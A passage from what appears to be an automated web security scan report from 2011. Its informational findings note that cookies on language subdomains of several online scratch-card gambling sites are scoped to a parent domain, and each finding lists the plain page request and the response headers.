Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h25bh155gvlaq045moqwhh2p; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=AA70828418124DA51B8663347992C3C5&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:31:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: UniqueVisitorID=AA70828418124DA51B8663347992C3C5; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.30. http://el.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://el.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: el.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=25hayo55lagve42tdt2pyq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.31. http://es.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4ssgtmj3jlvc145m24vlpap; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.32. http://es.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2fqv2zf00zxxhy45nsxwkkn5; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:10:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: UniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.33. http://es.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2gztkjbjjhq5j245dm50ad3r; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: UniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.34. http://es.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gin3f3ve5ssjqvecjgozqu2m; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=94A1C2407036BBC289743D1C0069248E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:34:59 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: UniqueVisitorID=94A1C2407036BBC289743D1C0069248E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.35. http://fi.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjfbcr2m41ex5r55rhrnngmf; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.36. http://fi.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hmgr1d45cnyeul45w4fbbd45; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:45:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: UniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.37. http://fi.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zn3bsef0l0ekkt45uzojyfea; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:24:05 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.38. http://fr.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bifmqjz1ktedjhqr1owcwx55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.39. http://fr.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5huvzsa0en1qm555mqufug55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:11:03 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: UniqueVisitorID=25F075332F047D1B0CF607CCD7D249CD; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:11:03 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45566


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.40. http://fr.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4pybr5mog1wyq1ypzxg2txmq; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:30:40 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0C638717D7C21970D51ED74830A7E2D9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:30:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.41. http://fr.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33f2gh45mw2dub45vfy4im55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=5402E87C2984227C4B267200D292C2AC&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:13 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: UniqueVisitorID=5402E87C2984227C4B267200D292C2AC; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:13 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.42. http://home.okscratchcards.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
